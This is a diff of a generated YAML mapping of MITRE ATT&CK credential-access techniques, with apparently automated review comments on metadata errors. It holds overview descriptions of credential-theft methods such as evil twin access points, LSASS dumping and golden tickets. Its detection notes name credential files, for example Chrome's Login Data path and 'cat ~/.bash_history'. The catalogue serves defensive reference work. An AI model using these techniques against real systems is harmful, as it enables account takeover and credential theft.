+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
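Review bot: the deleted `identifier: T1552` line at the tail of this hunk (just before `atomic_tests: []`) is not replaced, so the new T1557.004 technique body ends with no `identifier:` key at all, while T1552.004, T1555.003 and T1552.003 elsewhere in this diff keep one; the old value would have been wrong for this body anyway, so either emit `identifier: T1557.004` here or state that the generator drops the key for every entry, rather than silently losing it. Minor: the description reads `the adversary may able to monitor` (missing `be`); since this file is generated, fix that in the upstream source rather than here.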
@@ -45263,9 +46033,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -45274,21 +46044,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
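Review bot: most of this hunk is key reordering rather than content: `x_mitre_attack_spec_version`, `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique` and `x_mitre_modified_by_ref` are removed lower down and re-added higher up with identical values. If the generator wrote keys in one fixed order, the real change would shrink to the platform swap (`Azure AD`, `Google Workspace`, `Office 365` out; `Office Suite`, `Identity Provider` in) and the `1.0` to `1.1` bump. That same platform rename recurs for T1110.003, T1649 and T1528 below, so anything downstream that filters `x_mitre_platforms` on the old strings will match nothing after this merge and should be updated in the same change.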
@@ -45328,55 +46099,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45406,6 +46132,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -45415,23 +46147,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45468,23 +46235,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -45517,21 +46284,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -45542,7 +46308,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45576,7 +46342,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45604,7 +46370,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45615,14 +46381,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
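Review bot: the `modified` timestamp for T1557.001 goes backwards here, from `2023-04-25T14:00:00.188Z` to `2022-10-25T15:46:55.393Z`, while every other `modified` change in this diff moves forward (T1552.004 directly above goes to 2024-10-04); T1558.001 further down regresses the same way. The `T14:00:00.188Z` suffix on the old values also appears on T1556.007 and T1558.001 and looks like a bulk release stamp rather than an object edit time, so the new value may be the more accurate one, but consumers that sync on `modified` will read this as a rollback; confirm the upstream source and say so in the commit message.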
@@ -45730,12 +46495,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45772,6 +46536,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45784,7 +46549,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45834,12 +46599,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45865,6 +46629,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45880,18 +46645,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -45918,14 +46683,11 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45936,13 +46698,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -45956,6 +46718,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -45966,12 +46729,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46046,7 +46809,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -46092,7 +46854,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46127,16 +46889,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
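Review bot: after this hunk T1558.001 has no `x_mitre_attack_spec_version` at all (the `2.1.0` line is deleted together with `spec_version` and nothing replaces it), whereas every other entry touched by this diff ends up at `3.2.0`; it also keeps `x_mitre_permissions_required: - User`, a field this same diff strips from T1555.003 and T1552.003. Combined with its `modified` date going back to 2020-11-05 in the previous hunk, T1558.001 looks like it was regenerated from an older copy of the object; check its source before merging. The T1649 description change in the second half of the hunk (`Azure AD` to `Entra ID`) is consistent with the T1556.007 and T1552.004 edits and is fine.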
@@ -46146,21 +46906,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -46209,33 +46971,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46250,25 +46990,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
